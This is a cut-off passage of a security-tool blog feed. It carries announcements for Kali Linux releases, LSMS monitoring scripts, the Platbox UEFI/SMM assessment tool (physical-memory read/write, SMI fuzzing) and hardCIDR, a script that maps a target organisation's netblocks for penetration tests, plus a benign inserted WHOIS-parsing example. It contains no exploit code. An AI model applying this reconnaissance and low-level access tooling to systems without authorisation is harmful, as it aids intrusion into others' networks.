target="_blank" title="search_deleted_exe.py">search_deleted_exe.py</a></td> </tr> <tr> <td>Test script to check if <a href="https://www.kitploit.com/search/label/Alerting" target="_blank" title="alerting">alerting</a> works</td> <td><a href="https://github.com/sqall01/LSMS/blob/main/scripts/test_alert.py" rel="nofollow" 
target="_blank" title="test_alert.py">test_alert.py</a></td> </tr> <tr> <td>Verify integrity of installed .deb packages</td> <td><a href="https://github.com/sqall01/LSMS/blob/main/scripts/verify_deb_packages.py" rel="nofollow" target="_blank" title="verify_deb_packages.py">verify_deb_packages.py</a></td> </tr> </tbody></table> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/sqall01/LSMS" rel="nofollow" target="_blank" title="Download LSMS">Download LSMS</a></span></b></div></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-8864648326357664352023-06-09T04:06:00.001-04:002023-06-09T04:06:04.385-04:00Kali Linux 2023.2 - Penetration Testing and Ethical Hacking Linux Distribution<div class="separator" style="clear: both; text-align: center;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1-rvy7a_CJvpwGJUoFfFgxB0yLv8NARp1n0gFG8adQnU5MqGn9DRAHt1uhMDVoSxAlOpeLgy2gAi61AHZTFAlvBTOav4RTyR8nmagL5x9p9fViiUsiN1DOc0SpV02kjuDPrX6AqR3ya4Zkfk_ZZnS-Oteun-BwTsK6utW10Wug0ZemQtGYEm_IWwMhA/s1200/kali-banner-2023.2-release.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="628" data-original-width="1200" height="334" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1-rvy7a_CJvpwGJUoFfFgxB0yLv8NARp1n0gFG8adQnU5MqGn9DRAHt1uhMDVoSxAlOpeLgy2gAi61AHZTFAlvBTOav4RTyR8nmagL5x9p9fViiUsiN1DOc0SpV02kjuDPrX6AqR3ya4Zkfk_ZZnS-Oteun-BwTsK6utW10Wug0ZemQtGYEm_IWwMhA/w640-h334/kali-banner-2023.2-release.jpg" width="640" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div></div><p></p>
Time for another Kali Linux release! – Kali Linux 2023.2. This release has various impressive updates.<span><a name='more'></a></span><div><p><br /></p><p>The <a href="https://bugs.kali.org/changelog_page.php">changelog</a> highlights over the last few weeks since March’s <a href="https://www.kali.org/releases/">release</a> of <a href="https://www.kali.org/blog/kali-linux-2023-1-release/">2023.1</a> are:</p><ul><li><strong><a href="https://www.kali.org/blog/kali-linux-2023-2-release/#new-hyper-v-vm-image">New VM image for Hyper-V</a></strong> - With “Enhanced Session Mode” out of the box</li><li><strong><a href="https://www.kali.org/blog/kali-linux-2023-2-release/#xfce--pipewire">Xfce audio stack update: enters PipeWire</a></strong> - Better audio for Kali’s default desktop</li><li><strong><a href="https://www.kali.org/blog/kali-linux-2023-2-release/#i3-desktop-overhaul">i3 desktop overhaul</a></strong> - i3-gaps merged with i3</li><li><strong><a href="https://www.kali.org/blog/kali-linux-2023-2-release/#xfce">Desktop updates</a></strong> - Easy hashing in Xfce</li><li><strong><a href="https://www.kali.org/blog/kali-linux-2023-2-release/#gnome-44">GNOME 44</a></strong> - Gnome Shell version bump</li><li><strong><a href="https://www.kali.org/blog/kali-linux-2023-2-release/#gnome-44">Icons & menus updates</a></strong> - New apps and icons in menu</li><li><strong><a href="https://www.kali.org/blog/kali-linux-2023-2-release/#new-tools-in-kali">New tools</a></strong> - As always, various new packages added</li></ul></div><div><br />
<b>More info <a href="https://www.kali.org/blog/kali-linux-2023-2-release/" target="_blank">here</a>.</b><br /><br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://www.kali.org/get-kali/" rel="nofollow" target="_blank" title="Download Kali Linux">Download Kali Linux 2023.2</a></span></b></div></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-62737352816402694792023-05-27T08:30:00.014-04:002023-05-27T08:30:00.138-04:00Platbox - UEFI And SMM Assessment Tool<p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjaeq12wA1A2STgsZa9YjNOl5d-sYPUTS3cH309LeH_cj35uQ1QW222qrEKUwUEDRKCfCZpG_b639IwLVCm551i-9cFikN2w_EFuOAOk5XtlpQiLQuBBM9GnNxdEQTuEwOm5l3sDyI5Ase7-EnBAaNr0lBo0tJMujHu30VXSZ3XfXHu1Usn7DLPL61gYw"><img alt="" border="0" height="614" id="BLOGGER_PHOTO_ID_7233974935195861698" src="https://blogger.googleusercontent.com/img/a/AVvXsEjaeq12wA1A2STgsZa9YjNOl5d-sYPUTS3cH309LeH_cj35uQ1QW222qrEKUwUEDRKCfCZpG_b639IwLVCm551i-9cFikN2w_EFuOAOk5XtlpQiLQuBBM9GnNxdEQTuEwOm5l3sDyI5Ase7-EnBAaNr0lBo0tJMujHu30VXSZ3XfXHu1Usn7DLPL61gYw=w640-h614" width="640" /></a></p><div><br /></div> <p dir="auto">UEFI and SMM <a href="https://www.kitploit.com/search/label/Assessment" target="_blank" title="Assessment">Assessment</a> Tool</p> <h2 dir="auto" tabindex="-1">Features</h2> <p dir="auto">Platbox is a tool that helps assessing the security of the platform:</p> <ul dir="auto"> <li>Dumps the platform registers that are interesting security-wise <ul dir="auto"> <li>Flash Locks</li> <li>MMIO and Remapping Locks</li> <li>SMM Base and Locks</li> <li>MSRs</li> </ul> </li> <li>RW <a href="https://www.kitploit.com/search/label/Access" target="_blank" title="access">access</a> to the PCI configuration space of devices.</li> <li>RW to physical memory and virtual memory.</li> <li>Allows allocating physical memory and map memory to usermode.</li> <li>Read and Write MSRs.</li> <li>Dump SPI Flash content (BIOS) into a file.</li> <li>Basic dumb SMI Fuzzer.</li> <li>Dump S3 Bootscript (from SMM-Lockbox) into a file.</li> 
<li>Dump EFI Memory Map (Linux only for now).</li> <li>List UEFI variables.</li> <li>Supports Linux and Windows.</li> <li>Supports Intel and AMD.</li> </ul><span><a name='more'></a></span><div><br /></div> <h3 dir="auto" tabindex="-1">Example of 'chipset' command output for an AMD platform</h3> <p dir="auto" style="text-align: center;"><a href="https://github.com/IOActive/Platbox/blob/main/example_chipset_output_amd.png" rel="nofollow" target="_blank" title="UEFI and SMM Assessment Tool (3)"></a><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjaeq12wA1A2STgsZa9YjNOl5d-sYPUTS3cH309LeH_cj35uQ1QW222qrEKUwUEDRKCfCZpG_b639IwLVCm551i-9cFikN2w_EFuOAOk5XtlpQiLQuBBM9GnNxdEQTuEwOm5l3sDyI5Ase7-EnBAaNr0lBo0tJMujHu30VXSZ3XfXHu1Usn7DLPL61gYw"><img alt="" border="0" height="614" id="BLOGGER_PHOTO_ID_7233974935195861698" src="https://blogger.googleusercontent.com/img/a/AVvXsEjaeq12wA1A2STgsZa9YjNOl5d-sYPUTS3cH309LeH_cj35uQ1QW222qrEKUwUEDRKCfCZpG_b639IwLVCm551i-9cFikN2w_EFuOAOk5XtlpQiLQuBBM9GnNxdEQTuEwOm5l3sDyI5Ase7-EnBAaNr0lBo0tJMujHu30VXSZ3XfXHu1Usn7DLPL61gYw=w640-h614" width="640" /></a></p><p dir="auto" style="text-align: center;"> <a href="https://github.com/IOActive/Platbox/blob/main/example_chipset_output_amd2.png" rel="nofollow" target="_blank" title="UEFI and SMM Assessment Tool (4)"></a><a href="https://blogger.googleusercontent.com/img/a/AVvXsEh2k-HptDlnJCwTYpVDdIBZaX4714UBaNyBEFThETVLDeQ1Ler2uWb9ehtAbiW3V4X4sbysitMpvQWM8AxpVdWRvKl4kslL4UBL7Kixage2JpqjMDCOEEAcR13Dd4J5l07HZu0SNd-fSjOJfl99veeqOlzk6_sFwx-Yi-pqbnX3pwyff6yLRMq9ED-arA"><img alt="" border="0" height="490" id="BLOGGER_PHOTO_ID_7233974944526510674" src="https://blogger.googleusercontent.com/img/a/AVvXsEh2k-HptDlnJCwTYpVDdIBZaX4714UBaNyBEFThETVLDeQ1Ler2uWb9ehtAbiW3V4X4sbysitMpvQWM8AxpVdWRvKl4kslL4UBL7Kixage2JpqjMDCOEEAcR13Dd4J5l07HZu0SNd-fSjOJfl99veeqOlzk6_sFwx-Yi-pqbnX3pwyff6yLRMq9ED-arA=w640-h490" width="640" /></a></p> <h2 dir="auto" tabindex="-1">Project Structure</h2> <p dir="auto">The project is 
divided as follows:</p> <ul dir="auto"> <li>PlatboxDrv: kernel drivers used for Linux and Windows.</li> <li>PlatboxLib: the usermode component that loads the <a href="https://www.kitploit.com/search/label/Kernel%20Driver" target="_blank" title="kernel driver">kernel driver</a> and provides access to all the previously listed features.</li> <li>PlatboxCli: a <a href="https://www.kitploit.com/search/label/Console" target="_blank" title="console">console</a> <a href="https://www.kitploit.com/search/label/Client" target="_blank" title="client">client</a> that uses the library.</li> <li>Pocs: an example of a program using features from the library.</li> </ul> <h2 dir="auto" tabindex="-1">Compilation Steps</h2> <h3 dir="auto" tabindex="-1">Windows</h3> <div>Release Build <div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="cmake -G &quot;Visual Studio 17 2022&quot; -A x64 -S .. -B &quot;build64&quot; cmake --build build64/ --target platbox_cli --config Release"><pre><code>cmake -G "Visual Studio 17 2022" -A x64 -S .. -B "build64"
cmake --build build64/ --target platbox_cli --config Release
</code></pre></div> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/IOActive/Platbox" rel="nofollow" target="_blank" title="Download Platbox">Download Platbox</a></span></b></div></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-50271434804902572212023-05-02T12:05:00.000-04:002023-05-02T12:05:04.831-04:00hardCIDR - Linux Bash Script To Discover The Netblocks, Or Ranges, Owned By The Target Organization<p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhZeQLQ5fQOoRhwdss6Ej7PqWGkxY0r2IlKys0P4RsQB1r1vGb3Bzr-vt9FTLwkPLCTe55uBHGMszIVwvG_eIe_Z33QzXKVhefjtX2EkYjz248OKShvY0A0JC-ZWnVHwtibYC2X4CKJ3_ub-KIAsTRPxbGOis7iedoSyNOQzoiLvKiZLlnwOwUI7p1NWg"><img alt="" border="0" height="538" id="BLOGGER_PHOTO_ID_7209873746744199458" src="https://blogger.googleusercontent.com/img/a/AVvXsEhZeQLQ5fQOoRhwdss6Ej7PqWGkxY0r2IlKys0P4RsQB1r1vGb3Bzr-vt9FTLwkPLCTe55uBHGMszIVwvG_eIe_Z33QzXKVhefjtX2EkYjz248OKShvY0A0JC-ZWnVHwtibYC2X4CKJ3_ub-KIAsTRPxbGOis7iedoSyNOQzoiLvKiZLlnwOwUI7p1NWg=w640-h538" width="640" /></a></p><p><br /></p> <p dir="auto">A Linux Bash script to <a href="https://www.kitploit.com/search/label/Discover" target="_blank" title="discover">discover</a> the netblocks, or ranges, (in CIDR notation) owned by the target organization during the <a href="https://www.kitploit.com/search/label/Intelligence%20Gathering" target="_blank" title="intelligence gathering">intelligence gathering</a> phase of a penetration test. 
This information is maintained by the five Regional Internet Registries (RIRs):</p> <p dir="auto"><em>ARIN</em> (North America)<br /> <em>RIPE</em> (Europe/Asia/Middle East)<br /> <em>APNIC</em> (Asia/Pacific)<br /> <em>LACNIC</em> (Latin America)<br /> <em>AfriNIC</em> (Africa)</p> <p dir="auto">In addition to netblocks and IP addresses, Autonomous System Numbers (ASNs) are also of interest. ASNs are used as part of the Border Gateway Protocol (BGP) for uniquely identifying each network on the Internet. Target organizations may have their own ASNs due to the size of their network or as a result of redundant service paths from peered service providers. These ASNs will reveal additional netblocks owned by the organization.</p><span><a name='more'></a></span><p dir="auto"><br /></p> <h2 dir="auto" tabindex="-1">Requirements</h2> <p dir="auto">ipcalc (for RIPE, APNIC, LACNIC, AfriNIC queries)</p> <h2 dir="auto" tabindex="-1">LACNIC</h2> <p dir="auto">A note on LACNIC before diving into the usage. LACNIC only allows queries by network range, ASN, Org Handle, or PoC Handle. This does not help us in locating these values based upon the organization name. They do, however, publish a list of all assigned ranges on a publicly accessible FTP server, along with their rate-limiting thresholds. So, there is an accompanying data file, which the script checks for, used to perform LACNIC queries locally. The script includes an update option <strong>-r</strong>, that can be used to update this data on an interval of your choosing. Approximate run time is just shy of 28 hours.</p> <h2 dir="auto" tabindex="-1">Usage</h2> <p dir="auto">The script with no specified options will query ARIN and a pool of BGP route servers. The route server is selected at random at runtime.
The <strong>-h</strong> option lists the help:</p> <p dir="auto" style="text-align: center;"><a href="https://camo.githubusercontent.com/437d1ecd09aa4268cc4ef868253e537028318036f5de5f0381ef1a7553e5ef8c/68747470733a2f2f7777772e747275737465647365632e636f6d2f77702d636f6e74656e742f75706c6f6164732f323031372f30332f696d67312e706e67" rel="nofollow" target="_blank" title="hardCIDR is a Linux Bash script, but also functions under macOS. Your mileage may vary on other distros. The script with no specified options will query ARIN and a pool of BGP route servers. The route server is selected at random at runtime. (3)"></a><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgkbrEe6O1fF0nfbYxO18Bqs5DD4hEUGXRzAfRS0l0GECrMD8O3LRBPh6Augu6YvePB_j6Hnj0-3OBsXAMBw6_KHHJEwlIEb9tBE0OQeH289bxJ8gD9ppyBWR04lBJ8tnbyuMyYF0m91XooHtRXMDnJ10DSsW0ewDfA9iIU_cO9oE577e_3qGBqNYBNQA"><img alt="" border="0" height="278" id="BLOGGER_PHOTO_ID_7209873721618169426" src="https://blogger.googleusercontent.com/img/a/AVvXsEgkbrEe6O1fF0nfbYxO18Bqs5DD4hEUGXRzAfRS0l0GECrMD8O3LRBPh6Augu6YvePB_j6Hnj0-3OBsXAMBw6_KHHJEwlIEb9tBE0OQeH289bxJ8gD9ppyBWR04lBJ8tnbyuMyYF0m91XooHtRXMDnJ10DSsW0ewDfA9iIU_cO9oE577e_3qGBqNYBNQA=w640-h278" width="640" /></a></p> <p dir="auto">The options may be used in any combination, all, or none. Unfortunately, none of the “other” RIRs note the actual CIDR notation of the range, so <code>ipcalc</code> is used to perform this function. If it is not installed on your system, the script will install it for you.</p> <p dir="auto">At the prompts, enter the organization name, the email domain, and whether country codes are used as part of the email. If answered <strong>Y</strong> to country codes, you will be prompted as to whether they precede the domain name or are appended to the TLD. A <a href="https://www.kitploit.com/search/label/Directory" target="_blank" title="directory">directory</a> will be created for the output files in /tmp/. 
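The step where the script hands a start-end range to ipcalc can be reproduced with the Python standard library. The following script is an added example written for this page, not part of hardCIDR: it parses constructed RIPE-style inetnum records (RFC 5737 documentation addresses and made-up org handles, not real registry data), converts each start-end range into the smallest set of CIDR blocks with ipaddress.summarize_address_range, and keeps only the records whose org handle matches exactly, which is the kind of handle-based validation the README recommends for filtering out similarly named organizations.

```python
import ipaddress
import re

# Constructed sample of RIPE-style "inetnum" records. The addresses are the
# RFC 5737 documentation ranges and the org handles are made up; this is not
# real registry data. ARIN hands back CIDR blocks directly, while the other
# RIRs return start - end ranges like these.
SAMPLE_WHOIS = """\
inetnum:        192.0.2.0 - 192.0.2.255
netname:        EXAMPLE-NET-1
descr:          Example Org
org:            ORG-EX1-RIPE

inetnum:        198.51.100.0 - 198.51.100.127
netname:        EXAMPLE-NET-2
org:            ORG-EX1-RIPE

inetnum:        203.0.113.0 - 203.0.113.191
netname:        OTHER-NET
org:            ORG-OT1-RIPE
"""


def parse_inetnum_records(text):
    """Split blank-line separated WHOIS output into records and return a
    list of (start, end, org) tuples; org is None when the field is absent.
    Only IPv4 "inetnum" records are handled here: "inet6num" values contain
    colons and would need a different field split."""
    records = []
    for block in re.split(r"\n\s*\n", text.strip()):
        fields = {}
        for line in block.splitlines():
            key, _, value = line.partition(":")
            fields[key.strip()] = value.strip()
        rng = fields.get("inetnum")
        if not rng:
            continue
        start, _, end = rng.partition("-")
        records.append((start.strip(), end.strip(), fields.get("org")))
    return records


def range_to_cidrs(start, end):
    """The job the script delegates to ipcalc: express an arbitrary
    start - end range as the minimal list of CIDR blocks. Ranges are often
    not aligned to a single prefix, so several blocks may come back."""
    first = ipaddress.ip_address(start)
    last = ipaddress.ip_address(end)
    return [str(net) for net in ipaddress.summarize_address_range(first, last)]


def cidrs_for_org(text, org_handle):
    """Return the CIDR blocks of records whose org field equals org_handle.
    Keying on the registry handle rather than a fuzzy organisation name
    avoids pulling in unrelated organisations with similar names."""
    blocks = []
    for start, end, org in parse_inetnum_records(text):
        if org == org_handle:
            blocks.extend(range_to_cidrs(start, end))
    return sorted(blocks, key=ipaddress.ip_network)


if __name__ == "__main__":
    for block in cidrs_for_org(SAMPLE_WHOIS, "ORG-EX1-RIPE"):
        print(block)
```

Feeding the output of a real query into parse_inetnum_records works the same way as long as the records are blank-line separated; the third sample record shows the non-aligned case, where one range becomes two prefixes.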
If the directory is found to exist, you will be prompted whether to overwrite. If answered <strong>N</strong>, a time stamp will be appended to the directory name.</p> <p dir="auto" style="text-align: center;"><a href="https://camo.githubusercontent.com/d6e7b07bc317e2aa6b6c28ad163254ab57ece1dc8caadf5ba6be21f3f2c837df/68747470733a2f2f7777772e747275737465647365632e636f6d2f77702d636f6e74656e742f75706c6f6164732f323031372f30332f696d67322e706e67" rel="nofollow" target="_blank" title="hardCIDR is a Linux Bash script, but also functions under macOS. Your mileage may vary on other distros. The script with no specified options will query ARIN and a pool of BGP route servers. The route server is selected at random at runtime. (5)"></a><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjtwLIQwW6jqe4Lq_qsOzGZJJwS0kJAOMYj5yvAdx-GyKugry7N-CKZx03i-e_Ak2BDP9UHH7GYtlo8SBcg6LaGG12suvIEBxuuRehLXeUPyofebvJIUbmNGbP9xbj5RVXwWfOV9rgc-q5hM3WABRdmWSNHl7O4jYw6KJ13wymnsVZy75ZvSwXY8wV3mA"><img alt="" border="0" height="278" id="BLOGGER_PHOTO_ID_7209873732258882178" src="https://blogger.googleusercontent.com/img/a/AVvXsEjtwLIQwW6jqe4Lq_qsOzGZJJwS0kJAOMYj5yvAdx-GyKugry7N-CKZx03i-e_Ak2BDP9UHH7GYtlo8SBcg6LaGG12suvIEBxuuRehLXeUPyofebvJIUbmNGbP9xbj5RVXwWfOV9rgc-q5hM3WABRdmWSNHl7O4jYw6KJ13wymnsVZy75ZvSwXY8wV3mA=w640-h278" width="640" /></a></p> <p dir="auto">The script queries each RIR, as well as a BGP route server, prompting along the way as to whether records were located. 
Upon completion, three files will be generated: a CSV based on Org Handle, a CSV based on PoC Handle, and a line-delimited file of all located ranges in CIDR notation.</p> <p dir="auto" style="text-align: center;"><a href="https://camo.githubusercontent.com/4328831e5e4d3ab30a0de41521709dd3aa75a2f28a66c851adce9bf15d20737c/68747470733a2f2f7777772e747275737465647365632e636f6d2f77702d636f6e74656e742f75706c6f6164732f323031372f30332f696d67332e706e67" rel="nofollow" target="_blank" title="hardCIDR is a Linux Bash script, but also functions under macOS. Your mileage may vary on other distros. The script with no specified options will query ARIN and a pool of BGP route servers. The route server is selected at random at runtime. (6)"></a><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhZeQLQ5fQOoRhwdss6Ej7PqWGkxY0r2IlKys0P4RsQB1r1vGb3Bzr-vt9FTLwkPLCTe55uBHGMszIVwvG_eIe_Z33QzXKVhefjtX2EkYjz248OKShvY0A0JC-ZWnVHwtibYC2X4CKJ3_ub-KIAsTRPxbGOis7iedoSyNOQzoiLvKiZLlnwOwUI7p1NWg"><img alt="" border="0" height="538" id="BLOGGER_PHOTO_ID_7209873746744199458" src="https://blogger.googleusercontent.com/img/a/AVvXsEhZeQLQ5fQOoRhwdss6Ej7PqWGkxY0r2IlKys0P4RsQB1r1vGb3Bzr-vt9FTLwkPLCTe55uBHGMszIVwvG_eIe_Z33QzXKVhefjtX2EkYjz248OKShvY0A0JC-ZWnVHwtibYC2X4CKJ3_ub-KIAsTRPxbGOis7iedoSyNOQzoiLvKiZLlnwOwUI7p1NWg=w640-h538" width="640" /></a></p> <p dir="auto">Cancelling the script at any time will remove any temporary working files and the directory created for the resultant output files.</p> <p dir="auto" style="text-align: center;"><a href="https://camo.githubusercontent.com/45cdc60c0cbf4f1d7f0589c911ff445865857ecdcd771a791673a74a22794cee/68747470733a2f2f7777772e747275737465647365632e636f6d2f77702d636f6e74656e742f75706c6f6164732f323031372f30332f696d67342e706e67" rel="nofollow" target="_blank" title="hardCIDR is a Linux Bash script, but also functions under macOS. Your mileage may vary on other distros. The script with no specified options will query ARIN and a pool of BGP route servers.
The route server is selected at random at runtime. (7)"></a><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhXHaRCZUcoQd286N34iiUN8QC_b3uuaNZia09e8joLm-kTcppEeAGQ2Egzo4xXMbYtrjDhWGq3fQAi-HBfAtnh116tEy-2VDIRSzyQQ8NGsZNSb5rZnEwwDi6c7II2SVAjlw1ZapYblsaJXZDABwAexJ_z3GnIPaLbK_rhIs6oBVWcnsaDPtKkHWM8tQ"><img alt="" border="0" height="144" id="BLOGGER_PHOTO_ID_7209873758061534146" src="https://blogger.googleusercontent.com/img/a/AVvXsEhXHaRCZUcoQd286N34iiUN8QC_b3uuaNZia09e8joLm-kTcppEeAGQ2Egzo4xXMbYtrjDhWGq3fQAi-HBfAtnh116tEy-2VDIRSzyQQ8NGsZNSb5rZnEwwDi6c7II2SVAjlw1ZapYblsaJXZDABwAexJ_z3GnIPaLbK_rhIs6oBVWcnsaDPtKkHWM8tQ=w640-h144" width="640" /></a></p> <p dir="auto">It should be noted that, due to similarity in some organization names, you could get back results not related to the target. The CSV files will provide the associated handles and URLs for further validation where necessary. It is also possible that employees of the target organization used their corporate email address to register their own domains. These will be found within the results as well.</p> <h2 dir="auto" tabindex="-1">Running with Docker</h2> <div><pre><code>docker build -t hardcidr .<br /></code></pre></div> <p dir="auto">Building the hardcidr image</p> <div><pre><code>docker run -v $(pwd):/tmp -it hardcidr<br /></code></pre></div> <p dir="auto">Running the container. 
Output will be saved to the current directory.</p> <h2 dir="auto" tabindex="-1">Additional Information</h2> <p dir="auto">For more information, check out the blog post on the TrustedSec website: <a href="https://www.trustedsec.com/blog/classy-inter-domain-routing-enumeration/" rel="nofollow" target="_blank" title="Classy Inter-Domain Routing Enumeration">Classy Inter-Domain Routing Enumeration</a></p> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/trustedsec/hardcidr" rel="nofollow" target="_blank" title="Download Hardcidr">Download Hardcidr</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-9458235984072908842023-03-15T22:45:00.000-03:002023-03-15T22:45:08.356-03:00Kali Linux 2023.1 - Penetration Testing and Ethical Hacking Linux Distribution<div class="separator" style="clear: both; text-align: center;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmYhOMjpsu7hngVFcQBa-2pDOwYYGMpNzXeRgSF72yscBBtZmUzg4NzARWxOeG5UMmAb4qQDxo_xNzoFzrwuknQ_Nw0yf9G8ZB9HlfBdHqtQX-DChEQ2NgtorWqBZysROB3UZg4TM9lTkOSmRLBeqweGSnpz3_pAEk0Zd8akbXTbfLLn497UyM5GgVvw/s1200/kali-2023.1-release.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="628" data-original-width="1200" height="334" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmYhOMjpsu7hngVFcQBa-2pDOwYYGMpNzXeRgSF72yscBBtZmUzg4NzARWxOeG5UMmAb4qQDxo_xNzoFzrwuknQ_Nw0yf9G8ZB9HlfBdHqtQX-DChEQ2NgtorWqBZysROB3UZg4TM9lTkOSmRLBeqweGSnpz3_pAEk0Zd8akbXTbfLLn497UyM5GgVvw/w640-h334/kali-2023.1-release.jpg" width="640" /></a></div></div><div class="separator" style="clear: both; text-align: center;"><br /></div><p></p>
Time for another Kali Linux release! – Kali Linux 2023.1. This release has various impressive updates.<span><a name='more'></a></span><div><br /></div><div>
<p>The <a href="https://bugs.kali.org/changelog_page.php">changelog</a> summary since the <a href="https://www.kali.org/blog/kali-linux-2022-4-release/">2022.4 release from December</a>:</p><ul><li><strong><a href="https://www.kali.org/blog/kali-linux-2023-1-release/#kali-purple">Kali Purple</a></strong> - The dawn of a new era. Kali is not only Offense, but starting to be defense</li><li><strong><a href="https://www.kali.org/blog/kali-linux-2023-1-release/#python-updates--changes">Python Changes</a></strong> - Python 3.11 & PIP changes going forward</li><li><strong><a href="https://www.kali.org/blog/kali-linux-2023-1-release/#2023-theme-refresh">2023 Theme</a></strong> - Our once a year theme update! This time, what’s old is new again</li><li><strong><a href="https://www.kali.org/blog/kali-linux-2023-1-release/#desktop-updates">Desktop Updates</a></strong> - Xfce 4.18 & KDE Plasma 5.27</li><li><strong><a href="https://www.kali.org/blog/kali-linux-2023-1-release/#default-kernel-settings">Default Kernel Settings</a></strong> - What makes the Kali kernel different</li><li><strong><a href="https://www.kali.org/blog/kali-linux-2023-1-release/#new-tools-in-kali">New Tools</a></strong> - As always, various new tools added</li></ul><br />
<b>More info <a href="https://www.kali.org/blog/kali-linux-2023-1-release/" target="_blank">here</a>.</b><br /><br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://www.kali.org/get-kali/" rel="nofollow" target="_blank" title="Download Kali Linux">Download Kali Linux 2023.1</a></span></b></div></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-19668940064311049932022-12-19T17:05:00.000-03:002022-12-19T17:05:00.270-03:00Kali Linux 2022.4 - Penetration Testing and Ethical Hacking Linux Distribution<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLEEw6Z3WyTvNIiKvv_J8ZBkwzQhYu3MRT6tiNkwp5BuJEdxA0TVanEKOc5FV6dbAZuFTn_zDuhmTVCVEsLvKvyg4Ia1NYbQGqRQKC-PVwJdJ2l0oUAaEih6fCEz6EV6zHLr3vfmlpc2LMbkKvf1f17fCxgP9uNFPKXX3hqi3LdWfa36ClpFPwS2Qgxg/s1200/kali-linux-2022.4-release.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="628" data-original-width="1200" height="334" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLEEw6Z3WyTvNIiKvv_J8ZBkwzQhYu3MRT6tiNkwp5BuJEdxA0TVanEKOc5FV6dbAZuFTn_zDuhmTVCVEsLvKvyg4Ia1NYbQGqRQKC-PVwJdJ2l0oUAaEih6fCEz6EV6zHLr3vfmlpc2LMbkKvf1f17fCxgP9uNFPKXX3hqi3LdWfa36ClpFPwS2Qgxg/w640-h334/kali-linux-2022.4-release.jpg" width="640" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><p></p>
Time for another Kali Linux release! – Kali Linux 2022.4. This release has various impressive updates.<span><a name='more'></a></span><div><br /></div><div>
<p>A summary of the <a href="https://bugs.kali.org/changelog_page.php">changelog</a> since <a href="https://www.kali.org/blog/kali-linux-2022-3-release/">August’s 2022.3 release</a>:</p><ul><li><strong><a href="https://www.kali.org/blog/kali-linux-2022-4-release/#microsoft-azure">Microsoft Azure</a></strong> - We are back on the Microsoft Azure store</li><li><strong><a href="https://www.kali.org/blog/kali-linux-2022-4-release/#more-platforms">More Platforms</a></strong> - Generic Cloud, QEMU VM image & Vagrant libvirt</li><li><strong><a href="https://www.kali.org/blog/kali-linux-2022-4-release/#social-networks">Social Networks</a></strong> - New homes, keeping in touch & press packs</li><li><strong><a href="https://www.kali.org/blog/kali-linux-2022-4-release/#kali-nethunter-pro-release">Kali NetHunter Pro</a></strong> - Announcing the first release of a “true” Kali Linux on the mobile phone (PinePhone / Pro)</li><li><strong><a href="https://www.kali.org/blog/kali-linux-2022-4-release/#kali-nethunter-update">Kali NetHunter</a></strong> - Internal Bluetooth support, kernel porting video, firmware updates & other improvements</li><li><strong><a href="https://www.kali.org/blog/kali-linux-2022-4-release/#desktop-updates">Desktop Updates</a></strong> - GNOME 43 & KDE 5.26</li><li><strong><a href="https://www.kali.org/blog/kali-linux-2022-4-release/#new-tools-in-kali">New Tools</a></strong> - As always, various new packages added</li></ul><br />
<b>More info <a href="https://www.kali.org/blog/kali-linux-2022-4-release/" target="_blank">here</a>.</b><br /><br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://www.kali.org/get-kali/" rel="nofollow" target="_blank" title="Download Kali Linux">Download Kali Linux 2022.4</a></span></b></div></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-2381306212539943852022-12-17T08:30:00.011-03:002022-12-17T08:30:00.299-03:00Octosuite - Advanced Github OSINT Framework<p></p><p></p><p dir="auto" style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjJoueB5KvYq1NY5FBDb54s5y2RtkyDb-WhZNham7UiI28_Gf3kqyi5cxdNtKPN3q96mAW8RGu2mpxBf-5cfl4GYrRkNxURo8MvQ9zjsgW_-ZCK27NnyWfQlzCNVrjazwRgelnbFEuMRN0Gg8iWn5tPZsJ-HUfnY2AldmtJQMeKhx060C1NGpOoJS2SHA"><img alt="" border="0" height="360" id="BLOGGER_PHOTO_ID_7173878148407791650" 